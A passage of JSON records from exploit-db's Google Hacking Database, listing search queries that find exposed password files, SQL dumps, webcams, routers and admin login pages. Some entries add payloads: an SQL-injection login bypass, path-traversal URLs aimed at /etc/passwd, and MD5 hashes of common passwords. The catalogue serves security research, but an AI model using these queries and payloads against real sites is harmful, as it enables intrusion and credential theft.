MercuryBoard:http://www.securityfocus.com/archive/1/389881/2005-02-06/2005-02-12/0Enter the following search:\"Powered by MercuryBoard [v1\"And the exploit does work!" }, { "signatureReferenceNumber": "865", "link": "https://www.exploit-db.com/ghdb/865/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=intitle%3A%22Index+of%22+sc_serv.conf+sc_serv++content", "shortDescription": "intitle:\"Index of\" sc_serv.conf sc_serv content", "textualDescription": "This dork lists sc_serv.conf files. These files contain information for Shoutcast servers and often contain cleartext passwords.Original dork: filetype:conf sc_serv.confCleaned by: c0wzClean date: 2005-04-26" }, { "signatureReferenceNumber": "866", "link": "https://www.exploit-db.com/ghdb/866/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?q=intitle%3A%22welcome+to+mono+xsp%22", "shortDescription": "intitle:\"welcome to mono xsp\"", "textualDescription": "XSD is the demo webserver for the Mono project and allows the execution of ASP.NET on Unix" }, { "signatureReferenceNumber": "867", "link": "https://www.exploit-db.com/ghdb/867/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle%3A%22DEFAULT_CONFIG+-+HP%22", "shortDescription": "intitle:\"DEFAULT_CONFIG - HP\"", "textualDescription": "High scalable Ethernet switches by HP running in the default configuration" }, { "signatureReferenceNumber": "868", "link": "https://www.exploit-db.com/ghdb/868/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=intitle:%22web+server+status%22+SSH+Telnet", "shortDescription": "intitle:\"web server status\" SSH Telnet", "textualDescription": "simple port scanners for most common ports" }, { "signatureReferenceNumber": "869", "link": "https://www.exploit-db.com/ghdb/869/", "category": "Pages containing login portals", "querystring": "http://www.google.de/search?q=intitle%3Aopengroupware.org+%22resistance+is+obsolete%22+%22Report+Bugs%22+%22Username%22+%22password%22", "shortDescription": "intitle:opengroupware.org \"resistance is obsolete\" \"Report Bugs\" \"Username\" \"password\"", "textualDescription": "Open groupware is a comprehensive open source groupware project running on all major platforms." }, { "signatureReferenceNumber": "870", "link": "https://www.exploit-db.com/ghdb/870/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&c2coff=1&q=intitle%3ALinksys+site%3Aourlinksys.com+&btnG=Search", "shortDescription": "intitle:Linksys site:ourlinksys.com", "textualDescription": "Ourlinksys.com DDNS entries pointing to Linksys web enabled cameras" }, { "signatureReferenceNumber": "871", "link": "https://www.exploit-db.com/ghdb/871/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:%22supervisioncam+protocol%22", "shortDescription": "intitle:\"supervisioncam protocol\"", "textualDescription": "\"SupervisionCam captures and compares images from video cameras, (internet) image files or the computer screen at intervals you define. It starts optional activities when a movement is detected.\"" }, { "signatureReferenceNumber": "872", "link": "https://www.exploit-db.com/ghdb/872/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&q=%2B%22HSTSNR%22+-%22netop.com%22&btnG=Google+Search", "shortDescription": "+\"HSTSNR\" -\"netop.com\"", "textualDescription": "This search reveals NetOp license files. From the netop website: \"NetOp Remote Control is the most comprehensive, effective and security-conscious way to maintain your IT operations. Designed to fit into all environments, NetOp lets you access users running virtually any operating system, including Windows, Linux, Mac OS X and Solaris. Location isn\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u20ac\u017e\u00c2\u00a2t terribly important either. The program offers unrivalled connectivity, supporting all standard communication protocols. Finally, NetOp is also the ideal way to manage and administrate your servers. The system contains a sweeping range of remote management tools, all available on one easy-to-use console.\"" }, { "signatureReferenceNumber": "873", "link": "https://www.exploit-db.com/ghdb/873/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl:getmsg.html+intitle:hotmail&ie=UTF-8&oe=UTF-8", "shortDescription": "inurl:getmsg.html intitle:hotmail", "textualDescription": "These pages contain hotmail messages that were saved as HTML. These messages can contain anything from personal data to cleartext passwords." }, { "signatureReferenceNumber": "874", "link": "https://www.exploit-db.com/ghdb/874/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intext%3A%22Please+enter+correct+password+for+Administrator+Access%2E+Thank+you%22+%22Copyright+%C2%A9+2003+SMC+Networks%2C+Inc%2E+All+rights+reserved%2E%22", "shortDescription": "intext:\"Please enter correct password for Administrator Access. Thank you\" \"Copyright \u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00a9 2003 SMC Networks, Inc. All rights reserved.\"", "textualDescription": "Finds SMC Routers." }, { "signatureReferenceNumber": "875", "link": "https://www.exploit-db.com/ghdb/875/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22delete+entries%22+inurl%3Aadmin%2Fdelete.asp", "shortDescription": "\"delete entries\" inurl:admin/delete.asp", "textualDescription": "As described in OSVDB article #13715:\"AspJar contains a flaw that may allow a malicious user to delete arbitrary messages. The issue is triggered when the authentication method is bypassed and /admin/delete.asp is accessed directly. It is possible that the flaw may allow a malicious user to delete messages resulting in a loss of integrity.\"The company supporting this software is no longer in business and the software is no longer being updated. Therefore, versions should not matter in this dork." }, { "signatureReferenceNumber": "876", "link": "https://www.exploit-db.com/ghdb/876/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl%3Acamctrl.cgi", "shortDescription": "inurl:camctrl.cgi", "textualDescription": "Vivotec web cams" }, { "signatureReferenceNumber": "877", "link": "https://www.exploit-db.com/ghdb/877/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=allintitle:Brains,+Corp.+camera", "shortDescription": "allintitle:Brains, Corp. camera", "textualDescription": "mmEye webcam / cam servermmEye is a multifunction multimedia server equipped with 32bit RISC CPU SH-3, and runs UNIX operating system (NetBSD).It has video input ports (1 S signal port, 2 composite signal ports) and PCMCIA Type II slots built in." }, { "signatureReferenceNumber": "878", "link": "https://www.exploit-db.com/ghdb/878/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&c2coff=1&q=%22Traffic+Analysis+for%22+%22RMON+Port+*+on+unit+*%22&btnG=Search", "shortDescription": "\"Traffic Analysis for\" \"RMON Port * on unit *\"", "textualDescription": "List of RMON ports produced by MRTG which is a network traffic analysis tool. See also #198" }, { "signatureReferenceNumber": "879", "link": "https://www.exploit-db.com/ghdb/879/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allintitle:aspjar.com+guestbook", "shortDescription": "allintitle:aspjar.com guestbook", "textualDescription": "\"An input validation vulnerability was reported in the ASPJar guestbook. A remote user can gain administrative access and can delete guestbook messages.The '/admin/login.asp' script does not properly validate user-supplied input in the password field. A remote user can supply the following characters in password field to inject SQL commands and be authenticated as the administrator:\"' or ''='I also found another vulnerability that hasn't been documented anywhere. Using the above search to find aspjar guestbooks, appending the guestbook directory with /data/guest.mdb will give you a database containing the plaintext username and password for the guestbook admin and all entries in the guestbook, including IP addresses of users.(This company is no longer in business and the software is no longer being updated so versions shouldn't matter)" }, { "signatureReferenceNumber": "880", "link": "https://www.exploit-db.com/ghdb/880/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?num=100&q=filetype%3Asql+%28%22values+%2A+MD5+%2A%22+%7C+%22values+%2A+password+%2A%22+%7C+%22values+%2A+encrypt+%2A%22%29", "shortDescription": "filetype:sql (\"values * MD5\" | \"values * password\" | \"values * encrypt\")", "textualDescription": "Locate insert statements making use of some builtin function to encrypt a password. PASSWORD(), ENCRYPT() and MD5() are searched." }, { "signatureReferenceNumber": "881", "link": "https://www.exploit-db.com/ghdb/881/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?num=100&q=+filetype%3Asql+%28%22passwd+values+%2A%2A%2A%2A%22+%7C+%22password+values+%2A%2A%2A%2A%22+%7C+%22pass+values+%2A%2A%2A%2A%22+%29", "shortDescription": "filetype:sql ("passwd values" | "password values" | "pass values" )", "textualDescription": "Find insert statements where the field (or table name) preceding the operator VALUES will be 'password' or 'passwd' or 'pass'. The rest of the statement should contain encrypted or plaintext password.An attacker can use these files to acquire database permissions that normally would not be given to the masses." }, { "signatureReferenceNumber": "882", "link": "https://www.exploit-db.com/ghdb/882/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?q=(inurl:81-cobalt+%7C+inurl:cgi-bin/.cobalt)", "shortDescription": "(inurl:81-cobalt | inurl:cgi-bin/.cobalt)", "textualDescription": "Cobal RaQ internal pages" }, { "signatureReferenceNumber": "883", "link": "https://www.exploit-db.com/ghdb/883/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl%3AWCP_USER", "shortDescription": "inurl:WCP_USER", "textualDescription": "WebConnect is client-server based software that provides secure browser based emulation to mainframe, midrange and UNIX systems" }, { "signatureReferenceNumber": "884", "link": "https://www.exploit-db.com/ghdb/884/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle%3A%22Dell+Laser+Printer%22+ews", "shortDescription": "intitle:\"Dell Laser Printer\" ews", "textualDescription": "Finds Dell's printers with EWS.EWS : Embedded Web Server technology enables the usage of a standard web browser to manage many aspects of the printer, for example, view consumable life, configure network parameters, view serial number information, printer usage etc.." }, { "signatureReferenceNumber": "885", "link": "https://www.exploit-db.com/ghdb/885/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&q=filetype%3Abok+intitle%3A%22Kurant+Corporation+StoreSense%22&filter=0", "shortDescription": "intitle:\"Kurant Corporation StoreSense\" filetype:bok", "textualDescription": "These are Kurant StoreSense admin logon pages." }, { "signatureReferenceNumber": "886", "link": "https://www.exploit-db.com/ghdb/886/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle%3A%22active+webcam+page%22", "shortDescription": "intitle:\"active webcam page\"", "textualDescription": "searches for \"Active Webcam\" feeds on websites, a popular USB webcam interface." }, { "signatureReferenceNumber": "887", "link": "https://www.exploit-db.com/ghdb/887/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&newwindow=1&safe=off&c2coff=1&as_qdr=all&q=+%22powered+by+CubeCart+2.0%22", "shortDescription": "\"powered by CubeCart 2.0\"", "textualDescription": "This search reveals an alarming number of servers running versions of Brooky CubeCart that are reported to be prone to multiple vulnerabilities due to insufficient sanitization of user-supplied data....susceptible to a remote directory traversal vulnerability...cross-site scripting vulnerability may allow for theft of cookie-based authentication credentials or other attacks.An exploit is not required.The following proof of concept examples are available:http://www.example.com/index.php?&language=../../../../../../../../etc/passwdhttp://www.example.com/index.php?&language=var%20test_variable=31337;alert(test_variable); Vulnerability was published 2-14-2005http://www.securityfocus.com/bid/12549/" }, { "signatureReferenceNumber": "888", "link": "https://www.exploit-db.com/ghdb/888/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&safe=off&c2coff=1&q=filetype%3Aora+tnsnames", "shortDescription": "filetype:ora tnsnames", "textualDescription": "This searches for tns names files. This is an Oracle configuration file that sets up connection strings for someone's Oracle client to contact the various databases it is managing. This file contains ports, IP's and server names of these database machines. What I think is more telling is that in most cases, this file is stored in Oracle's installation directory which can probably be more telling." }, { "signatureReferenceNumber": "889", "link": "https://www.exploit-db.com/ghdb/889/", "category": "Network or vulnerability data", "querystring": "http://www.google.co.uk/search?hl=en&q=intitle%3A%22Belarc+Advisor+Current+Profile%22+intext%3A%22Click+here+for+Belarc%27s+PC+Management+products%2C+for+large+and+small+companies.%22&btnG=Search&meta", "shortDescription": "intitle:\"Belarc Advisor Current Profile\" intext:\"Click here for Belarc's PC Management products, for large and small companies.\"", "textualDescription": "People who have foolishly published an audit of their machine(s) on the net with some server info as well" }, { "signatureReferenceNumber": "890", "link": "https://www.exploit-db.com/ghdb/890/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&q=intitle%3A%22SuSE+Linux+Openexchange+Server%22+%22Please+activate+JavaScript%21%22", "shortDescription": "intitle:\"SuSE Linux Openexchange Server\" \"Please activate JavaScript!\"", "textualDescription": "Another way to find the web administration portal of linux open exchange servers." }, { "signatureReferenceNumber": "891", "link": "https://www.exploit-db.com/ghdb/891/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&q=inurl%3A%22suse%2Flogin.pl%22", "shortDescription": "inurl:\"suse/login.pl\"", "textualDescription": "More Suse login portals, mostly Open Exchange." }, { "signatureReferenceNumber": "892", "link": "https://www.exploit-db.com/ghdb/892/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?num=100&q=intitle%3AHomeSeer.Web.Control+%7C+Home.Status.Events.Log", "shortDescription": "intitle:HomeSeer.Web.Control | Home.Status.Events.Log", "textualDescription": "HomeSeer (http://www.homeseer.com/) provides a well known home automation solution (software + hardware)This dork will find web interfaces of homeseer." }, { "signatureReferenceNumber": "893", "link": "https://www.exploit-db.com/ghdb/893/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?num=100&q=Powered.by.RaidenHTTPD+intitle%3Aindex.of", "shortDescription": "Powered.by.RaidenHTTPD intitle:index.of", "textualDescription": "RaidenHTTPD ( http://www.raidenhttpd.com/en ) is a full featured web server software for Windows" }, { "signatureReferenceNumber": "894", "link": "https://www.exploit-db.com/ghdb/894/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&c2coff=1&as_qdr=all&q=filetype%3Aini+Desktop.ini+intext%3Amydocs.dll&btnG=Search", "shortDescription": "filetype:ini Desktop.ini intext:mydocs.dll", "textualDescription": "This dork finds any webshared windows folder inside my docs. You can change the end bit \"intext:mydocs.dll\" by looking inside any of your your own folders on your pc, looking for the desktop.ini file and add some of the information to the query. For Anouther example - Shell Folders (Favourite etc) filetype:ini Desktop.iniintext:shell32.dllEnjoy" }, { "signatureReferenceNumber": "895", "link": "https://www.exploit-db.com/ghdb/895/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&q=%22%23mysql+dump%22+filetype%3Asql+21232f297a57a5a743894a0e4a801fc3&btnG=Search", "shortDescription": "\"#mysql dump\" filetype:sql 21232f297a57a5a743894a0e4a801fc3", "textualDescription": "this is a mod of one of the previous queries posted in here. the basic thing is, to add this:21232f297a57a5a743894a0e4a801fc3to your query, that oryginally results in a username lists with a MD5 encrypted password.this one finds mysql dumps with for a users who's passwordsare \"admin\" :)the \"21232f297a57a5a743894a0e4a801fc3\" is md5 result for \"admin\"you can try it with other queris on this site.use also:63a9f0ea7bb98050796b649e85481845 for root098f6bcd4621d373cade4e832627b4f6 for test3c3662bcb661d6de679c636744c66b62 for sexf561aaf6ef0bf14d4208bb46a4ccb3ad for xxxif you'll get lucky, you'll get a username, and a encryoted password, witch is the one above that u used.remember, that this works for all files that contain plaintex username and md5 encrypted passwords. use this techniq with other queris that you'll find hereuff... i hope i made my self clear." }, { "signatureReferenceNumber": "896", "link": "https://www.exploit-db.com/ghdb/896/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=allinurl%3Awps%2Fportal%2F+login&btnG=Cerca&meta=", "shortDescription": "allinurl:wps/portal/ login", "textualDescription": "Login to IBM WebSphere Portal.You may find portals using standard administrator user/password which gave you complete access to the application itself." }, { "signatureReferenceNumber": "897", "link": "https://www.exploit-db.com/ghdb/897/", "category": "Various Online Devices", "querystring": "http://www.google.de/search?q=intitle%3Aasterisk.management.portal+web-access&btnG=Search&hl=en&c2coff=1&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial", "shortDescription": "intitle:asterisk.management.portal web-access", "textualDescription": "Coalescent Systems Inc. launched The Asterisk Management Portal project to bring together best-of-breed applications to produce a \"canned\" (but fully functional) turn-key small business phone system based on The Asterisk Open Source PBX." }, { "signatureReferenceNumber": "898", "link": "https://www.exploit-db.com/ghdb/898/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=intitle%3A%22Flash+Operator+Panel%22+-ext%3Aphp+-wiki+-cms+-inurl%3Aasternic+-inurl%3Asip+-intitle", "shortDescription": "intitle:\"Flash Operator Panel\" -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists", "textualDescription": "Flash Operator Panel is a switchboard type application for the Asterisk PBX. It runs on a web browser with the flash plugin. It is able to display information about your PBX activity in real time." }, { "signatureReferenceNumber": "899", "link": "https://www.exploit-db.com/ghdb/899/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&q=ext%3Atxt+inurl%3Aunattend.txt&btnG=Search", "shortDescription": "ext:txt inurl:unattend.txt", "textualDescription": "the unattend.txt is used to drive unanttended MS Windows installations. The files contain all information for a Windows information including Administrator's passwords, IP addresses and product IDs." }, { "signatureReferenceNumber": "900", "link": "https://www.exploit-db.com/ghdb/900/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&q=filetype%3Ainf+sysprep+&btnG=Search", "shortDescription": "filetype:inf sysprep", "textualDescription": "sysprep is used to drive unanttended MS Windows installations. The files contain all information for a Windows information including Administrator's passwords, IP addresses and product IDs." }, { "signatureReferenceNumber": "901", "link": "https://www.exploit-db.com/ghdb/901/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:%22Service+Managed+Gateway+Login%22+&hl=en&lr=&c2coff=1&client=firefox-a&rls=org.mozilla:en-US:official&filter=0", "shortDescription": "intitle:\"Service Managed Gateway Login\"", "textualDescription": "service Managed Gateway from VirtualAccess login page" }, { "signatureReferenceNumber": "902", "link": "https://www.exploit-db.com/ghdb/902/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=%22Powered+by+UebiMiau%22+-site%3Asourceforge.net", "shortDescription": "\"Powered by UebiMiau\" -site:sourceforge.net", "textualDescription": "UebiMiau is a simple, yet efficient cross-plataform POP3/IMAP mail reader written in PHP. It's have some many features, such as: Folders, View and Send Attachments, Preferences, Search, Quota Limit" }, { "signatureReferenceNumber": "903", "link": "https://www.exploit-db.com/ghdb/903/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl%3Awebmail.%2Findex.pl+%22Interface%22", "shortDescription": "inurl:webmail./index.pl \"Interface\"", "textualDescription": "Webmail system which reveals that the website is hosted by vDeck" }, { "signatureReferenceNumber": "904", "link": "https://www.exploit-db.com/ghdb/904/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:%22BorderWare+MXtreme+Mail+Firewall+Login%22", "shortDescription": "intitle:\"BorderWare MXtreme Mail Firewall Login\"", "textualDescription": "BorderWare MXtreme Mail firewallMXtreme is a hardened appliance with a highly robust mail transfer agent (MTA) and email gateway that prevents email-borne threats from entering your network while protecting against spam and viruses." }, { "signatureReferenceNumber": "905", "link": "https://www.exploit-db.com/ghdb/905/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:%22actiontec%22+main+setup+status+%22Copyright+2001+Actiontec+Electronics+Inc%22&hl=en&lr=&client=firefox-a&rls=org.mozilla:en-US:official&filter=0", "shortDescription": "intitle:\"actiontec\" main setup status \"Copyright 2001 Actiontec Electronics Inc\"", "textualDescription": "Actiontec Routers." }, { "signatureReferenceNumber": "906", "link": "https://www.exploit-db.com/ghdb/906/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered.by%3A.vBulletin.Version+...3.0.6&btnG=Search", "shortDescription": "Powered.by:.vBulletin.Version ...3.0.6", "textualDescription": "vBulletin is reported prone to an arbitrary PHP script code execution vulnerability. The issue is reported to exist due to a lack of sufficient input sanitization performed on user-supplied data before this data is included in a dynamically generated scripthttp://www.securityfocus.com/bid/12622/info/" }, { "signatureReferenceNumber": "907", "link": "https://www.exploit-db.com/ghdb/907/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle%3A%22VMware+Management+Interface%3A%22+inurl%3A%22vmware%2Fen%2F%22", "shortDescription": "intitle:\"VMware Management Interface:\" inurl:\"vmware/en/\"", "textualDescription": "VMware GSX Server is enterprise-class virtual infrastructure software for x86-based servers. It is ideal for server consolidation, disaster recovery and streamlining software development processes." }, { "signatureReferenceNumber": "908", "link": "https://www.exploit-db.com/ghdb/908/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=filetype%3Aphp+intitle%3A%22paNews+v2.0b4%22+&btnG=Search", "shortDescription": "filetype:php intitle:\"paNews v2.0b4\"", "textualDescription": "PaNews is reported prone to a remote PHP script code execution vulnerability. It is reported that PHP script code may be injected into the PaNews software through the 'showcopy' parameter of the 'admin_setup.php' script. http://www.securityfocus.com/bid/12611" }, { "signatureReferenceNumber": "909", "link": "https://www.exploit-db.com/ghdb/909/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=%22Webthru+User+Login%22&hl=en&lr=&filter=0", "shortDescription": "\"Webthru User Login\"", "textualDescription": "samsung webthru cameras" }, { "signatureReferenceNumber": "910", "link": "https://www.exploit-db.com/ghdb/910/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&q=ext%3Acgi++intitle%3A%22control+panel%22+%22enter+your+owner+password+to+continue%21%22&btnG=Search", "shortDescription": "ext:cgi intitle:\"control panel\" \"enter your owner password to continue!\"", "textualDescription": "Free Perl Guestbook (FPG) administration page. Only a password is needed to logon." }, { "signatureReferenceNumber": "911", "link": "https://www.exploit-db.com/ghdb/911/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:%22ListMail+Login%22+admin+-demo&filter=0", "shortDescription": "intitle:\"ListMail Login\" admin -demo", "textualDescription": "Listmail mailinglist manager admin logon" }, { "signatureReferenceNumber": "912", "link": "https://www.exploit-db.com/ghdb/912/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?q=intitle:%22Test+Page+for+the+Apache+HTTP+Server+on+Fedora+Core%22+intext:%22Fedora+Core+Test+Page%22&filter=0", "shortDescription": "intitle:\"Test Page for the Apache HTTP Server on Fedora Core\" intext:\"Fedora Core Test Page\"", "textualDescription": "Apache 2.0 on Fedore Core Test page" }, { "signatureReferenceNumber": "913", "link": "https://www.exploit-db.com/ghdb/913/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?q=%22Powered+by%3A+vBulletin+Version+1.1.5%22", "shortDescription": "\"Powered by: vBulletin Version 1.1.5\"", "textualDescription": "This google dork reveals vulnerable message boards. It works for all Vbulletin version up to 2.0 beta 2. To try for other versions just change the version number in the dork.These vulnerable message boards allow remote code execution.More on this can be found here:http://www.securiteam.com/securitynews/5IP0B203PI.htmlit has a fairly good explanation of the exploits incorporated with these versions." }, { "signatureReferenceNumber": "914", "link": "https://www.exploit-db.com/ghdb/914/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=wwwboard+WebAdmin++inurl:passwd.txt+wwwboard%7Cwebadmin+&hl=en&lr=&c2coff=1&filter=0", "shortDescription": "wwwboard WebAdmin inurl:passwd.txt wwwboard|webadmin", "textualDescription": "This is a filtered version of previous 'inurl:passwd' searches, focusing on WWWBoard [1]. There are different crypt functions involved [2], but the default username and password is 'WebAdmin:WebBoard' without the quotes. This is my first Googledork entry, so be gentle :)Funny enough, many of the DES hashes seem to use a salt of \"ae\". I tried just using this string along with the inurl portion, but it seemed to inappropriately restrict the search. Couple this with [3] and, um, yeah.cykyc[1]http://www.scriptarchive.com/wwwboard.html[2]http://www.scriptarchive.com/faq/wwwboard.html#q2[3]http://johnny.ihackstuff.com/index.php?module=prodreviews&func=showcontent&id=625" }, { "signatureReferenceNumber": "915", "link": "https://www.exploit-db.com/ghdb/915/", "category": "Pages containing login portals", "querystring": "http://www.google.de/search?q=intitle%3Aasterisk.management.portal+web-access&btnG=Search&hl=en&c2coff=1&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial", "shortDescription": "intitle:asterisk.management.portal web-access", "textualDescription": "VOXBOX Asterisk web management. Allows to manage Asterisk configuration like calls and SIP settings." }, { "signatureReferenceNumber": "916", "link": "https://www.exploit-db.com/ghdb/916/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=intitle%3Aindex.of+%2Fmaildir%2Fnew%2F", "shortDescription": "intitle:index.of /maildir/new/", "textualDescription": "search gives you a mailbox dir. Contains a lot of mails." }, { "signatureReferenceNumber": "917", "link": "https://www.exploit-db.com/ghdb/917/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle%3A%22Flash+Operator+Panel%22+-ext%3Aphp+-wiki+-cms+-inurl%3Aasternic+-inurl%3Asip+-intitle%3AANNOUNCE+-inurl%3Alists+&btnG=Search", "shortDescription": "intitle:\"Flash Operator Panel\" -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists", "textualDescription": "Flash Operator Panel is a switchboard type application for the Asterisk PBX. It runs on a web browser with the flash plugin. It is able to display information about your PBX activity in real time." }, { "signatureReferenceNumber": "918", "link": "https://www.exploit-db.com/ghdb/918/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=%22Powered+by+Coppermine+Photo+Gallery%22+%28+%22v1.2.2+b%22+%7C+%22v1.2.1%22+%7C+%22v1.2%22+%7C+%22v1.1%22+%7C+%22v1.0%22%29&btnG=Se", "shortDescription": "\"Powered by Coppermine Photo Gallery\" ( \"v1.2.2 b\" | \"v1.2.1\" | \"v1.2\" | \"v1.1\" | \"v1.0\")", "textualDescription": "Reportedly Coppermine Photo Gallery is prone to multiple input validation vulnerabilities, some of which may lead to arbitrary command execution. These issues are due to the application failing to properly sanitize and validate user-supplied input prior to using it in dynamic content and system command execution function calls.These issues may be exploited to steal cookie based authentication credentials, map the application root directory of the affected application, execute arbitrary commands and include arbitrary files. Other attacks are also possible.http://www.securityfocus.com/bid/10253/" }, { "signatureReferenceNumber": "919", "link": "https://www.exploit-db.com/ghdb/919/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=allinurl:%22weblog/referrers%22&sourceid=opera&num=0&ie=utf-8&oe=utf-8", "shortDescription": "WebLog Referrers", "textualDescription": "ExpressionEngine is a modular, flexible, feature-packed web publishing system that adapts to a broad range of needs." }, { "signatureReferenceNumber": "920", "link": "https://www.exploit-db.com/ghdb/920/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?num=100&q=inurl%3Abin.welcome.sh+%7C+inurl%3Abin.welcome.bat+%7C+intitle%3AeHealth.5.0", "shortDescription": "inurl:bin.welcome.sh | inurl:bin.welcome.bat | intitle:eHealth.5.0", "textualDescription": "eHealth, a network management solution, enables its users to manage performance and availability of LANs, WANs, routers, Switches, Frame Relay, ATM, Remote Access Equipment, QoS, Wireless LAN, DAL, Voice and Cable technologies." }, { "signatureReferenceNumber": "921", "link": "https://www.exploit-db.com/ghdb/921/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?q=yaws.%2A.server.at", "shortDescription": "yaws.*.server.at", "textualDescription": "YAWS (http://yaws.hyber.org), Yet Another Web Server, is a HTTP high perfomance 1.1 webserver. Yaws is entirely written in Erlang, furthermore it is a multithreaded webserver where one Erlang light weight process is used to handle each client." }, { "signatureReferenceNumber": "922", "link": "https://www.exploit-db.com/ghdb/922/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=intitle%3A%22IPC%40CHIP+Infopage%22+&btnG=Search", "shortDescription": "intitle:\"IPC@CHIP Infopage\"", "textualDescription": "web server detection for IPC@chip embedded webserverThe dork uses the webserver's infopage which reveals some very interesting information.See securityfocus advisory for more info: http://www.securityfocus.com/bid/2767" }, { "signatureReferenceNumber": "923", "link": "https://www.exploit-db.com/ghdb/923/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=intitle%3A%22Index+of+*%22+mode++links++bytes++last-changed++name", "shortDescription": "thttpd webserver", "textualDescription": "thttpd is is a webserver written in C and should compile and run on most unix-like systems. As of version 2.20 or later, thttpd is known to build and run on the following platforms, usually on at least recent platform versions: * FreeBSD* NetBSD* BSD/OS* Solaris* Tru64 / DIGITAL UNIX / OSF/1* SunOS* Linux* HP-UX* MacOS X* UnixWare* AMIGAOS* NCR MP-RAS BASE 3.02 (EISA/MCA)* Sega Dreamcast* Compaq iPaq 3765* Windows 2000/XP (port of 2.07 only)" }, { "signatureReferenceNumber": "924", "link": "https://www.exploit-db.com/ghdb/924/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle%3Aendymion.sak%C3%A9.mail.login.page+%7C+inurl%3Asake.servlet&num=100", "shortDescription": "intitle:endymion.sak\u00c3\u0192\u00c6\u2019\u00c3\u201a\u00c2\u00a9.mail.login.page | inurl:sake.servlet", "textualDescription": "sak\u00c3\u0192\u00c6\u2019\u00c3\u201a\u00c2\u00a9 Mail, servlet-based web email system, designed for scaling to large numbers of concurrent users. Intended for large universities or enterprise-level mail system" }, { "signatureReferenceNumber": "925", "link": "https://www.exploit-db.com/ghdb/925/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:%22OfficeConnect+Wireless+11g+Access+Point%22+%22Checking+your+browser%22&hl=en&lr=&filter=0", "shortDescription": "intitle:\"OfficeConnect Wireless 11g Access Point\" \"Checking your browser\"", "textualDescription": "OfficeConnect Wireless 11g Access Point" }, { "signatureReferenceNumber": "926", "link": "https://www.exploit-db.com/ghdb/926/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?num=100&q=powered.by.instaBoard.version.1.3", "shortDescription": "powered.by.instaBoard.version.1.3", "textualDescription": "InstaBoard is a coldfusion forum solution. In its version 1.3 it is vulnerable to SQL Injection.Bugtraq ID 7338" }, { "signatureReferenceNumber": "927", "link": "https://www.exploit-db.com/ghdb/927/", "category": 